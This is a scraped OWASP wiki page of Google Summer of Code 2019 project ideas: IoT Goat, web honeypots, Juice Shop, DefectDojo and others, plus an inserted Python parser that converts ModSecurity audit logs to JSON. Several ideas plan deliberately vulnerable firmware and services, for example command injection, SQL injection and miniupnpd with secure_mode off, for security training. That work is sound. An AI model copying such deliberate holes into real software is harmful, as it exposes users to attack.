: '''Getting Started:''' <br />
:* Have a look at the ZAP [https://github.com/zaproxy/zaproxy/blob/develop/CONTRIBUTING.md CONTRIBUTING.md] file, especially the 'Coding' section.<br />
:* We like to see students who have already contributed to ZAP, so try fixing one of the bugs flagged as [https://github.com/zaproxy/zaproxy/issues?q=is%3Aopen+is%3Aissue+label%3AIdealFirstBug IdealFirstBug].<br />
: '''Knowledge Prerequisites:'''<br />
:* ZAP is written in Java, so a good knowledge of this language is recommended. Some knowledge of application security would be useful, but not essential.<br />
: '''Mentors:''' [https://www.owasp.org/index.php/User:Psiinon Simon Bennetts] [mailto:psiinon@gmail.com @] and the rest of the ZAP Core Team<br />
<br />
=== Automated Authentication Detection and Configuration ===<br />
: '''Brief Explanation:'''<br />
: Currently a user must manually configure ZAP to handle authentication, eg as per <nowiki>https://github.com/zaproxy/zaproxy/wiki/FAQformauth</nowiki><br />
: This is time consuming and error prone.<br />
: Ideally ZAP would help detect login and registration pages and provide more assistance when configuring authentication, ideally being able to completely automate the task for as many sorts of webapps as possible.<br />
: This project will be a continuation of the work that was started as part of last year's GSoC.<br />
: '''Expected Results:'''<br />
:* Detect login and registration pages<br />
:* Provide a wizard to walk users through the process of setting up authentication, with as much assistance as possible<br />
:* An option to completely automate the authentication process, for as many authentication mechanisms as possible<br />
: '''Getting Started:''' <br />
:* Have a look at the ZAP [https://github.com/zaproxy/zaproxy/blob/develop/CONTRIBUTING.md CONTRIBUTING.md] file, especially the 'Coding' section.<br />
:* We like to see students who have already contributed to ZAP, so try fixing one of the bugs flagged as [https://github.com/zaproxy/zaproxy/issues?q=is%3Aopen+is%3Aissue+label%3AIdealFirstBug IdealFirstBug].<br />
: '''Knowledge Prerequisites:'''<br />
:* ZAP is written in Java, so a good knowledge of this language is recommended. Some knowledge of application security would be useful, but not essential.<br />
: '''Mentors:''' [https://www.owasp.org/index.php/User:Psiinon Simon Bennetts] [mailto:psiinon@gmail.com @] and the rest of the ZAP Core Team<br />
<br />
== IoT Goat ==<br />
IoT Goat will be a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf IoT Top 10 2018]. <br />
<br />
===Idea 1: Insecure firmware web application ecosystem===<br />
'''Brief Explanation:'''<br />
<br />
A vulnerable web application, and backend API/web services deployed in OpenWrt containing critical vulnerabilities showcasing the traditional IoT problems.<br />
<br />
''' Getting started '''<br />
* Have a look at the getting started page to get familiar with virtualizing OpenWrt: https://github.com/scriptingxss/IoTGoat/blob/master/BuildEnvironment.md<br />
* Create a GitHub account to be a collaborator to the repository<br />
* Review the example vulnerabilities and challenges: https://github.com/scriptingxss/IoTGoat/blob/master/Examples/Weak%2C%20Guessable%2C%20or%20Hardcoded%20Passwords.md and https://github.com/scriptingxss/IoTGoat/blob/master/challenges/challenges.md<br />
<br />
'''Expected Results:'''<br />
<br />
Development of a simple web application user interface with web services and APIs deployed locally on the OpenWrt firmware. Documented challenges on how to discover and remediate web software security vulnerabilities. The insecure web application services must contain the following vulnerabilities, to be used with the IoT testing guide: <br />
* Command injection<br />
* SQL injection<br />
* Local file inclusion <br />
* XXE injection<br />
* Insufficient authentication<br />
* Transfer sensitive data using insecure channels<br />
* Store sensitive data insecurely<br />
Vulnerable SOAP web services and REST API implementations are in-scope. <br />
<br />
'''Knowledge Prerequisites:'''<br />
* Working Linux knowledge<br />
* Embedded and/or web development (nice to have)<br />
** Web application code can be developed using the following common embedded programming languages:<br />
*** Lua<br />
*** PHP<br />
*** C/C++<br />
*** JavaScript<br />
<br />
===Idea 2: Insecure network services===<br />
'''Brief Explanation:'''<br />
<br />
Deliberately insecure services configured within OpenWrt, such as a miniupnpd daemon configured with secure_mode off (in secure mode a client can only redirect an incoming port to itself, i.e. the same IP the request comes from), to demonstrate a port mapping attack where an attacker inside the network exposes a service that should normally stay behind the LAN to the internet. <br />
<br />
''' Getting started '''<br />
* Have a look at the getting started page to get familiar with virtualizing OpenWrt: https://github.com/scriptingxss/IoTGoat#-getting-started-<br />
* Create a GitHub account to be added as a collaborator to the repository<br />
* Review the example vulnerabilities and challenges: https://github.com/scriptingxss/IoTGoat/blob/master/challenges/challenges.md<br />
<br />
'''Expected Results:'''<br />
<br />
Documented challenges of how to discover and remediate insecure network service vulnerabilities. The network services can be inherently insecure or have insecure configurations that can be abused during the challenges.<br />
* Examples of insecure network services include:<br />
** FTP<br />
** Telnet<br />
** miniupnpd<br />
** HTTP<br />
'''Knowledge Prerequisites:'''<br />
* Working Linux knowledge<br />
* Network security<br />
<br />
===Idea 3: Insecure firmware build system===<br />
'''Brief Explanation:'''<br />
<br />
Develop custom firmware builds of the latest OpenWrt version (18.06) demonstrating the process of incorporating debug services/tools, misconfigurations, and usage of vulnerable software packages. <br />
<br />
''' Getting started '''<br />
* Review OpenWrt's developer guide to get familiar with creating custom firmware builds<br />
** https://openwrt.org/docs/guide-developer/start<br />
** https://openwrt.org/docs/guide-developer/build-system/install-buildsystem<br />
** https://github.com/openwrt/openwrt<br />
<br />
'''Expected Results:'''<br />
* Provide walkthrough examples of insecure design choices for building firmware. <br />
* Provide suggested mitigation security controls<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Working Linux knowledge<br />
* Embedded development (C/C++)<br />
<br />
===Suggest your own ideas===<br />
You may suggest additional challenges or ideas that fit this project's objectives.<br />
<br />
=== Mentors and Leaders ===<br />
* Aaron Guzman - OWASP IoT Goat Contributor (Project leader of the IoT and Embedded AppSec project)<br />
* Fotios Chantzis - OWASP IoT Goat Contributor (and former GSoC Student/GSoc Mentor)<br />
* [[User:Calderpwn|Paulino Calderon]] - OWASP IoT Goat Contributor (and former GSoC 2011 Student/GSoc Mentor in 2015 and 2017)<br />
<br />
==OWASP Web Honeypot Project ==<br />
<br />
The goal of the OWASP Honeypot Project is to identify emerging attacks against web applications and report them to the community, in order to facilitate protection against such targeted attacks. Within this project, Anglia Ruskin University is leading the collection, storage and analysis of threat intelligence data. <br />
<br />
https://www.owasp.org/index.php/OWASP_Honeypot_Project<br />
<br />
https://github.com/OWASP/Honeypot-Project/<br />
<br />
<br />
===Brief Explanation===<br />
The purpose of this part of the project is to capture intelligence on attacker activity against web applications and utilise this intelligence as ways to protect software against attacks. Honeypots are an established industry technique to provide a realistic target to entice a criminal, whilst encouraging them to divulge the tools and techniques they use during an attack. Like bees to a honeypot. These honeypots are safely designed to contain no information of monetary use to an attacker, and hence provide no risk to the businesses implementing them. <br><br />
<br />
The project will create honeypots that the community can distribute within their own networks. With enough honeypots globally distributed, we will be in a position to aggregate attack techniques to better understand and protect against the techniques used by attackers. With this information, we will be in a position to create educational information, such as rules and strategies, that application writers can use to ensure that any detected bugs and vulnerabilities are closed. <br><br />
<br />
===Idea===<br />
Project progression: <br />
* Honeypot software. The honeypot software that is to be provided to the community to place in their networks has been written. Honeypots are available in a variety of forms, to make deployment as flexible as possible and to appeal to as diverse a user set as possible.<br />
* Collection software. The centralised collection software has been written and evaluated in a student driven proof-of-concept project. Honeypots have been attacked in a laboratory situation and have reported both the steps taken by the attacker and what they have attacked, back to the collection software.<br />
* Rollout to the Community. The project now needs a dedicated infrastructure platform in place that is available to the entire community, to start collecting intelligence back from community-deployed honeypots. This infrastructure will run the collector software and analysis programmes and provide a portal for communicating our findings and recommendations back to the community in a meaningful manner.<br />
* Going Forward. Toolkits and skills used by attackers do not stand still. As existing bugs are plugged, others open. Follow up stages for the project will be to create a messaging system to automatically update the community on findings of significant risk in their existing code that requires attention. <br />
<br />
<br />
===Expected Results===<br />
<br />
Some of the ideas from last year's summit<br />
<br />
* Set up a proof of concept to understand how a ModSecurity-based honeypot/probe interacts with a receiving console (develop a VM and/or Docker based test solution to store logs from multiple probes).<br />
* Evaluate console options to visualise threat data received from ModSecurity honeypots/probes in the ModSecurity Audit Console, WAF-FLE, Fluent and bespoke scripts, for single and multiple probes.<br />
* Develop a mechanism to convert from stored MySQL to JSON format.<br />
* Provide a mechanism to convert ModSecurity mlogc audit log output into JSON format.<br />
* Provide a mechanism to convert mlogc audit log output directly into ELK (ElasticSearch/Logstash/Kibana) to visualise the data.<br />
* Provide a mechanism to forward honeypot output into a threat intelligence format such as STIX, using something like the MISP project (https://www.misp-project.org) to share threat data coming from the honeypots, making it easy to export/import data in formats such as STIX and TAXII. This may require the use of concurrent logs in a format that MISP can deal with.<br />
* Consider new alternatives for log transfer including the use of MLOGC-NG or other possible approaches.<br />
* Develop a new VM-based honeypot/probe based on CRS v3.0.<br />
* Develop new alternative small footprint honeypot/probe formats utilising Docker & Raspberry Pi.<br />
* Develop machine learning approach to automatically be able to update the rule set being used by the probe based on cyber threat intelligence received.<br />
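The mlogc-audit-log-to-JSON conversion listed above, as an added example that is not part of the OWASP Honeypot Project's own code: a small Python parser for ModSecurity's native (serial) audit log format, assuming the usual part layout (A summary line, B request, F response, H trailer with the rule matches, Z terminator) and using a constructed sample entry rather than a real capture.

```python
import json
import re

# Boundary line of ModSecurity's native ("serial") audit log format:
# "--<boundary>-<part letter>--". Part A opens an entry, part Z closes it.
_BOUNDARY = re.compile(r"^--([0-9a-fA-F]+)-([A-Z])--$")
# Part A summary line: [timestamp] transaction_id src_ip src_port dst_ip dst_port
_PART_A = re.compile(
    r"^\[(?P<ts>[^\]]+)\]\s+(?P<txid>\S+)\s+(?P<src_ip>\S+)\s+(?P<src_port>\d+)"
    r"\s+(?P<dst_ip>\S+)\s+(?P<dst_port>\d+)$"
)
# [key "value"] tags on a part-H "Message:" line, e.g. [id "920350"] [msg "..."]
_TAG = re.compile(r'\[(\w+) "((?:[^"\\]|\\.)*)"\]')

# Constructed sample entry (not a real capture): one request flagged by a CRS rule.
SAMPLE_AUDIT_LOG = """\
--3fa2b1c0-A--
[20/Mar/2019:17:36:38 +0000] XJJuJsCoAQEAAAVoKwMAAAAA 203.0.113.7 51234 192.0.2.10 80
--3fa2b1c0-B--
GET /wp-login.php HTTP/1.1
Host: 192.0.2.10
User-Agent: constructed-sample/1.0

--3fa2b1c0-F--
HTTP/1.1 403 Forbidden
Content-Length: 0

--3fa2b1c0-H--
Message: Warning. Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [id "920350"] [msg "Host header is a numeric IP address"] [severity "WARNING"]
--3fa2b1c0-Z--

"""


def _split_entries(text):
    """Group each audit entry's raw lines by part letter (A, B, F, H, ...)."""
    entries, current, part = [], {}, None
    for line in text.splitlines():
        m = _BOUNDARY.match(line)
        if m:
            part = m.group(2)
            if part == "A":  # a new transaction starts here
                current = {}
                entries.append(current)
            if part == "Z":  # end of transaction; trailing blank lines are ignored
                part = None
            else:
                current.setdefault(part, [])
        elif part is not None:
            current.setdefault(part, []).append(line)
    return entries


def _start_line_and_headers(lines):
    """Parts B and F: a start line, then headers up to the first blank line."""
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return (lines[0] if lines else None), headers


def _alerts(lines):
    """Reduce each part-H 'Message:' line to the rule id, message and severity."""
    alerts = []
    for line in lines:
        if line.startswith("Message:"):
            tags = dict(_TAG.findall(line))
            alerts.append({k: tags.get(k) for k in ("id", "msg", "severity")})
    return alerts


def parse_audit_log(text):
    """Turn every transaction in a native-format audit log into a JSON-ready dict."""
    result = []
    for entry in _split_entries(text):
        a = _PART_A.match((entry.get("A") or [""])[0])
        req_line, req_headers = _start_line_and_headers(entry.get("B", []))
        resp_line, resp_headers = _start_line_and_headers(entry.get("F", []))
        method, path = (req_line.split(" ") + [None, None])[:2] if req_line else (None, None)
        status = resp_line.split(" ")[1] if resp_line and " " in resp_line else ""
        result.append({
            "timestamp": a.group("ts") if a else None,
            "transaction_id": a.group("txid") if a else None,
            "client": {"ip": a.group("src_ip"), "port": int(a.group("src_port"))} if a else None,
            "server": {"ip": a.group("dst_ip"), "port": int(a.group("dst_port"))} if a else None,
            "request": {"method": method, "path": path, "headers": req_headers},
            "response": {"status": int(status) if status.isdigit() else None, "headers": resp_headers},
            "alerts": _alerts(entry.get("H", [])),
        })
    return result


def audit_log_to_json(text):
    """Serialise the parsed transactions as a JSON array, one object per entry."""
    return json.dumps(parse_audit_log(text), indent=2)
```

The resulting objects carry the source IP, rule id and severity per transaction, which is the shape a central collector or an ELK pipeline can index directly.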
<br />
<br />
=== Students Requirements ===<br />
<br />
Some of the skills we are looking for:<br />
<br />
* Apache/Tomcat <br />
* Any experience of MISP<br />
* MySQL & JSON<br />
* ELK <br />
* STIX/TAXII<br />
* Python<br />
* ModSecurity/mlogc<br />
* OWASP Core RuleSet (CRS)<br />
* Linux<br />
* VM/Docker<br />
<br />
=== Mentors === <br />
<br />
* [mailto:adrian.winckles@owasp.org Adrian Winckles] - (OWASP Web Honeypot Project Leader) <br><br />
<br />
===Suggest your own ideas===<br />
<br />
You may suggest additional challenges or ideas that fit this project's objectives.<br />
<br />
==OWASP Risk Assessment Framework ==<br />
This tool project aims to assess one or many web applications using the OWASP Risk Rating Methodology.<br />
<br />
https://github.com/OWASP/RiskAssessmentFramework<br />
<br />
'''Idea 1:''' Build a dashboard with a database that can assess many websites based on the OWASP Risk Rating Methodology, and create graphs and reports in PDF, Word and Excel formats.<br><br />
'''Idea 2:''' Static Application Security Testing. <br />
=== Students Requirements ===<br />
<br />
* Python<br />
* Java<br />
* Javascript <br />
* Angular and NodeJS/Express<br />
* Database<br />
* Linux<br />
<br />
=== Mentors === <br />
<br />
* [mailto:ade.putra@owasp.org Ade Yoseman Putra] - (Mentor) <br><br />
* [mailto:rejah.rehim@owasp.org Rejah Rehim.A.A] - (Mentor)<br />
<br></div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=GSoC2019_Ideas&diff=249037GSoC2019 Ideas2019-03-20T17:36:38Z<p>Aaron.guzman: /* IoT Goat */</p>
<hr />
<div>=OWASP Project Requests=<br />
<br />
'''Tips to get you started in no particular order:''' <br />
'''* Read [https://developers.google.com/open-source/gsoc/ Google Summer of Code Program (GSOC)]'''<br />
'''* Read the [[GSoC SAT]] '''<br />
* Read the [https://www.owasp.org/index.php/GSoC GSOC Student Guidelines]<br />
* Contact us through the mailing list or irc channel.<br />
* Check our [https://github.com/OWASP github organization]<br />
<br />
<br />
==OWASP-SKF==<br />
<br />
=== Idea 1 Improving the Machine Learning chatbot: ===<br />
We want to extend the functionality of the SKF Bot (Security Knowledge Framework Chatbot).<br />
<br />
Some suggested improvements:<br />
<br />
1. Create a desktop version of the chatbot that people can install on their local machine.<br />
<br />
2. Create a plugin or website bot that we can embed in the website for a better chat experience for the user.<br />
<br />
3. Extend the bot's capability to perform Google searches (using web scraping) for things that are not available in the database, so that it has a wider scope of knowledge.<br />
<br />
4. Add a basic conversation flow that makes the SKF Bot friendly and provides a better user experience, e.g. replies to general queries like "How are you?" or "What is your name?".<br />
<br />
5. Extend the bot's capability to reply with which security controls should be followed from the ASVS, MASVS or other custom checklists present in SKF.<br />
<br />
6. Extend the bot to different platforms like Facebook, Telegram, Slack, Google Assistant etc.<br />
<br />
The existing chatbot implementation is on Gitter. You can test the bot by typing @skfchatbot in the Gitter community.<br />
<br />
'''Getting started:'''<br />
<br />
* Get familiar with the architecture and code base of SKF (Security Knowledge Framework)<br />
* Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
* Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
<br />
* Python 3+, Flask, CoffeeScript<br />
<br />
'''Mentors and Leaders'''<br />
<br />
Glenn ten Cate (Mentor, Project leader)<br />
<br />
Riccardo ten Cate (Mentor, Project leader)<br />
<br />
Priyanka Jain (Mentor)<br />
<br />
=== Idea 2 Improving and building Lab challenges and write-ups: ===<br />
Build lab examples and write-ups (how to test) for different vulnerabilities over different technology stacks. These challenges are to be delivered in Docker so they can be easily deployed.<br />
<br />
In the current situation the Security Knowledge Framework ultimately presents a list of security controls with correlating knowledge base items that contain a description and a solution. The new labs are used to give software developers or application security specialists a more in-depth understanding of, and approach to, how to test the vulnerabilities in their own code.<br />
* For example, we now have around 20 lab challenges as Docker containers built in Python:<br />
** A Local File Inclusion Docker app example:<br />
*** https://github.com/blabla1337/skf-labs/tree/master/LFI<br />
** A write-up example:<br />
*** https://owasp-skf.gitbook.io/asvs-write-ups/filename-injection<br />
The images that are pushed to the GitHub repository are automatically built and pushed to a Docker registry, from which SKF users can easily pull the images to get their labs running. Of course they can also download and build them themselves from source by pulling the original repository.<br />
<br />
'''Mentors and Leaders''' <br />
<br />
Glenn ten Cate (Mentor, Project leader)<br />
<br />
Riccardo ten Cate (Mentor, Project leader)<br />
<br />
== OWASP DefectDojo ==<br />
OWASP DefectDojo is a popular open source vulnerability management tool and is used as the backbone for security programs. It is easy to get started working on! We welcome volunteers of all experience levels and are happy to provide mentorship.<br />
<br />
'''Issue Tracking:'''<br />
<br />
Enhancement [https://github.com/DefectDojo/django-DefectDojo/issues?q=is%3Aissue+is%3Aopen+label%3Aenhancement requests] and [https://github.com/DefectDojo/django-DefectDojo/issues?q=is%3Aissue+is%3Aopen+label%3Abug bugfixes] are located in Github issues. This project could implement a whole bunch of new features one by one and release them over the course of several small releases. <br />
<br />
'''Expected Results:'''<br />
* 5 or more new features or functional enhancements of significant scope for OWASP DefectDojo<br />
* Each feature comes with full functional unit and integration tests<br />
'''Getting started:'''<br />
* Get familiar with the architecture and code base of the application built on Django<br />
* Review the application functionality and familiarize yourself with Products, Engagements, Tests and Findings.<br />
* Get familiar with the CI/CD process based on Travis-CI<br />
'''Knowledge Prerequisites:'''<br />
* Python, Django, Javascript, Unit/Integration testing.<br />
'''Potential Mentors:'''<br />
* [[Mailto:aaron.weaver2+gsoc@gmail.com|Aaron Weaver]] - DefectDojo Project Leader<br />
* [[Mailto:greg.anderson@owasp.org|Greg Anderson]] - DefectDojo Project Leader<br />
* [[Mailto:matt.tesauro@owasp.org|Matt Tesauro]] - DefectDojo Project Leader<br />
'''Option 1: Unit Tests - Difficulty: Easy'''<br />
* If you're new to programming, unit tests are short scripts designed to test a specific function of an application.<br />
* The project needs additional unit tests to ensure that new code functions properly. <br />
* Review the current [https://github.com/DefectDojo/django-DefectDojo/tree/dev/dojo/unittests unit tests] <br />
* Complete Code Coverage Testing<br />
** Validate Tests exist for the following (create any that are missing):<br />
*** Finding, Test, Engagement, Reports, Endpoints <br />
*** Import from all scanners <br />
'''Option 2: Python3 Completion'''<br />
* DefectDojo is finishing up a migration to Python3<br />
* Test the current [https://github.com/DefectDojo/django-DefectDojo/tree/python3/dojo/unittests state] of Python3<br />
* Ensure all features work<br />
* Travis testing works correctly<br />
'''Option 3: Scan 2.0 / Launch Containers'''<br />
<br />
Scan 2.0 consists of automating the scanning orchestration within DefectDojo. Several proofs of concept exist for this using the AppSecPipeline to launch containers and then push the resulting findings into the appropriate product.<br />
* Use the [https://github.com/appsecpipeline/AppSecPipeline-Specification AppSecPipeline] containers to build a scanning pipeline built on top of [https://www.openfaas.com/ OpenFaaS]<br />
* Scans should be able to be scheduled by DefectDojo and then invoked via the REST API call to OpenFaaS<br />
* Upon scan completion the results will be posted back to DefectDojo via DefectDojo's REST API and consumed as an engagement/test.<br />
* Pick 2 or 3 popular open source scanners such as NMAP, ZAP and Nikto to start out with.<br />
<br />
== OHP (OWASP Honeypot) ==<br />
<br />
[[OWASP_Python_Honeypot|OWASP Honeypot]] is open source software written in Python, designed for creating honeypots and honeynets in an easy and secure way! This project is compatible with Python 2.x and 3.x and is tested on Windows, Mac OS X and Linux.<br />
<br />
=== Getting Started ===<br />
<br />
It's best to start from the [https://github.com/zdresearch/OWASP-Honeypot/wiki GitHub wiki page]. We are looking forward to adding more modules and optimizing the core.<br />
<br />
=== Technologies ===<br />
<br />
Currently we are using<br />
<br />
* Docker<br />
* Python<br />
* MongoDB<br />
* TShark<br />
* Flask<br />
* ChartJS<br />
* And more Linux services<br />
<br />
=== Expected Results ===<br />
<br />
* Zero Bugs: Currently we may have several bugs under different conditions, and it's best to test all functions and fix them<br />
* Monitoring: Right now monitoring is limited to the connections (send & receive); it's best to store and analyse the contents for further investigation and for recognizing incoming attacks.<br />
* Duplicated code: the engine code is complicated and duplicated and should be fixed/cleaned up<br />
* New modules: add some creative ICS/Network/Web modules and vulnerable web applications, services and the like<br />
* API: keep the API in sync with all features<br />
* WebUI: Demonstrate and add the API on the WebUI and the Live version with all features<br />
* WebUI Special Reports: Track the attacks more creatively and provide high-risk IPs<br />
* Database: Better database structure, faster, and using a queue<br />
* Data analysis: Analyse stored data and attack signatures<br />
* OWASP Top 10: Prepare useful processed/raw data for the OWASP Top 10 project<br />
<br />
=== Students Requirements ===<br />
<br />
* Python<br />
* Packet Analysis & Tshark & Libpcap<br />
* Docker<br />
* Database<br />
* Web Development Skills<br />
* Honeypot and Deception knowledge<br />
<br />
=== Mentors and Leaders ===<br />
<br />
* [mailto:ali.razmjoo@owasp.org Ali Razmjoo] (Mentor & Project Leader)<br />
* [mailto:ehsan@nezami.me Ehsan Nezami] (Mentor & Project Leader)<br />
* [mailto:reza.espargham@owasp.org Reza Espargham] (Mentor)<br />
* [mailto:abiusx@owasp.org Abbas Naderi] (Mentor)<br />
<br />
== OWASP Juice Shop ==<br />
<br />
[[OWASP Juice Shop Project]] is an intentionally insecure webapp for security trainings written entirely in Javascript which encompasses the entire OWASP Top Ten and other severe security flaws. Juice Shop is written in Node.js, Express and Angular. The application contains more than 30 challenges of varying difficulty where the user is supposed to exploit the underlying vulnerabilities. Apart from the hacker and awareness training use case, pentesting proxies or security scanners can use Juice Shop as a "guinea pig"-application to check how well their tools cope with Javascript-heavy application frontends and REST APIs.<br />
The best way to get in touch with us is the '''community chat on https://gitter.im/bkimminich/juice-shop<nowiki/>.''' You can also send PMs to the potential mentors (@bkimminich, @J12934 and @CaptainFreak) there if you like!<br />
<br />
To receive early feedback please '''put your proposal on Google Docs and submit it to the OWASP Organization on Google's GSoC page''' in ''Draft Shared'' mode. Please pick '''''juice shop'' as Proposal Tag''' to make them easier to find for us. '''Thank you!'''<br />
<br />
=== Feature Pack 2019 ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
Ideas for potential new functionality and "business" features are collected in [https://github.com/bkimminich/juice-shop/issues?q=is%3Aissue+is%3Aopen+label%3Afeature GitHub issues labeled "feature"]. This project could implement a whole bunch of new features one by one and release them over the course of several small releases. This would allow the student to work in a professional Continuous Delivery kind of way while bringing benefit to the Juice Shop over the duration of the project.<br />
<br />
''Coming up with good additional ideas for features and new functionality in the proposal could make the difference between being selected or declined as a student for this project!''<br />
<br />
'''Expected Results:'''<br />
* 5 or more new features or functional enhancements of significant scope for OWASP Juice Shop (not necessarily including corresponding challenges)<br />
* Each feature comes with full functional unit and integration tests<br />
* Extending the functional walk-through chapter of the "Pwning OWASP Juice Shop" ebook<br />
* Code follows existing styleguides and passes all existing quality gates regarding code smells, test coverage etc.<br />
<br />
''' Getting started: '''<br />
* Get familiar with the architecture and code base of the application's rich Javascript frontend and RESTful backend<br />
* Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
* Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular and NodeJS/Express, security knowledge is optional.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Juice Shop Mobile ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
A complete mobile client for the Juice-Shop API which will serve a legitimate mobile experience for Juice-Shop users as well as a plethora of mobile app vulnerabilities and challenges around them to solve. In the best case it should translate the idea of Juice Shop's hacking challenges, with a score board and success notifications, into the mobile world.<br />
<br />
''Coming up with a sophisticated proposal (optimally even with a good initial sample implementation) could make the difference between being selected or declined as a student for this project!''<br />
<br />
''' Getting started '''<br />
* Get familiar with the architecture and code base of the application's RESTful backend<br />
* Get familiar with native app development<br />
* Get familiar with Mobile vulnerabilities<br />
<br />
'''Expected Results:'''<br />
* A mobile App with consistent UI/UX for Juice-Shop with standard client side vulnerabilities.<br />
* Sufficient initial release quality (on par with Juice Shop and Juice Shop CTF) to make it an official extension project hosted in its own GitHub repository ''bkimminich/juice-shop-mobile''<br />
* Code follows existing styleguides and applies similar quality gates regarding code smells, test coverage etc. as the main project.<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) React Native and NodeJS/Express, some Mobile security knowledge would be preferable.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Challenge Pack 2019 ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
Ideas for potential new hacking challenges are collected in [https://github.com/bkimminich/juice-shop/issues?q=is%3Aissue+is%3Aopen+label%3Achallenge GitHub issues labeled "challenge"]. This project could implement a whole bunch of challenges one by one and release them over the course of several small releases. This would allow the student to work in a professional Continuous Delivery kind of way while bringing benefit to the Juice Shop over the duration of the project.<br />
<br />
''Coming up with good additional ideas for challenges in the proposal could make the difference between being selected or declined as a student for this project!''<br />
<br />
'''Expected Results:'''<br />
* 10 or more new challenges for OWASP Juice Shop (including required functional enhancements to place the challenges)<br />
* Each challenge comes with full functional unit and integration tests<br />
* Each challenge is verified to be exploitable by corresponding end-to-end tests<br />
* Hint and solution sections for each new challenge are added to the "Pwning OWASP Juice Shop" ebook<br />
* Code follows existing styleguides and passes all existing quality gates regarding code smells, test coverage etc.<br />
<br />
''' Getting started: '''<br />
* Get familiar with the architecture and code base of the application's rich Javascript frontend and RESTful backend<br />
* Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
* Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular and NodeJS/Express, some security knowledge would be preferable.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Hacking Instructor ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
While the Juice Shop is offering a lot of long-lasting motivation and challenges for security experts, it might be a bit daunting for newcomers and less experienced hackers.<br />
The "Hacking Instructor" as sketched in [https://github.com/bkimminich/juice-shop/issues/440 GitHub issue #440] could guide users from this target audience through at least some of the hacking challenges. As this would be an entirely new and relatively independent feature of the Juice Shop, students should be able to bring in their own creativity and ideas a lot.<br />
<br />
''For this project, a good proposal with a design & implementation proposal more sophisticated than the rough ideas in [https://github.com/bkimminich/juice-shop/issues/440 #440] is paramount to be selected as a student!''<br />
<br />
'''Expected Results:'''<br />
* A working implementation of e.g. an avatar-style "Hacking Instructor" or another solution based on the student's own proposal<br />
* Coverage of at least the trivial (1-star) and some easy (2-star) challenges<br />
* Documentation on how to configure or script the "Hacking Instructor" for challenges in general<br />
<br />
''' Getting started: '''<br />
* Get familiar with the architecture and code base of the application's rich Javascript frontend and RESTful backend<br />
* Get a feeling for the high code & test quality bar by inspecting the existing test suites and static code analysis results<br />
* Get familiar with the CI/CD process based on Travis-CI and several associated 3rd party services<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular, some UI/UX experience would be preferable.<br />
<br />
'''Potential Mentors:'''<br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
* Jannik Hollenbach - OWASP Juice Shop Project Collaborator<br />
* Shoeb Patel - OWASP Juice Shop Contributor (and former GSoC 2018 Student)<br />
<br />
=== Your idea ===<br />
<br />
'''Brief Explanation:'''<br />
<br />
You have an awesome idea to improve OWASP Juice Shop that is not on this list? Great, please submit it!<br />
<br />
''' Getting started '''<br />
* Get in touch with [https://www.owasp.org/index.php/User:Bjoern_Kimminich Bjoern Kimminich]<br />
<br />
'''Expected Results:'''<br />
* A new feature that makes OWASP Juice Shop even better<br />
* Code follows existing styleguides and passes all existing quality gates regarding code smells, test coverage etc.<br />
<br />
'''Knowledge Prerequisites:'''<br />
* Javascript, Unit/Integration testing, experience with (or willingness to learn) Angular and NodeJS/Express, some security knowledge would be preferable.<br />
<br />
'''Mentors:''' <br />
* [[User:Bjoern_Kimminich|Bjoern Kimminich]] - OWASP Juice Shop Project Leader<br />
<br />
==OWASP-Securetea Tools Project ==<br />
The OWASP SecureTea Project is an application designed to help secure a person's laptop, computer or server with IoT (Internet of Things) by notifying users (via various communication mechanisms) whenever someone accesses their computer / server. The application uses the touchpad/mouse/wireless mouse to determine activity; it is developed in Python and tested on various machines (Linux, Mac & Windows).<br />
<br />
https://github.com/OWASP/SecureTea-Project/blob/master/README.md<br />
<br />
===Brief Explanation===<br />
Do you have an awesome idea to improve the SecureTea Project that is not on this list? We are looking for it! We expect this project to be useful to everyone for securing their small IoT devices.<br />
<br />
===Idea===<br />
From the roadmap and expected results below you can choose what to improve in the SecureTea Project. If you find any bugs, please help to fix them.<br />
<br />
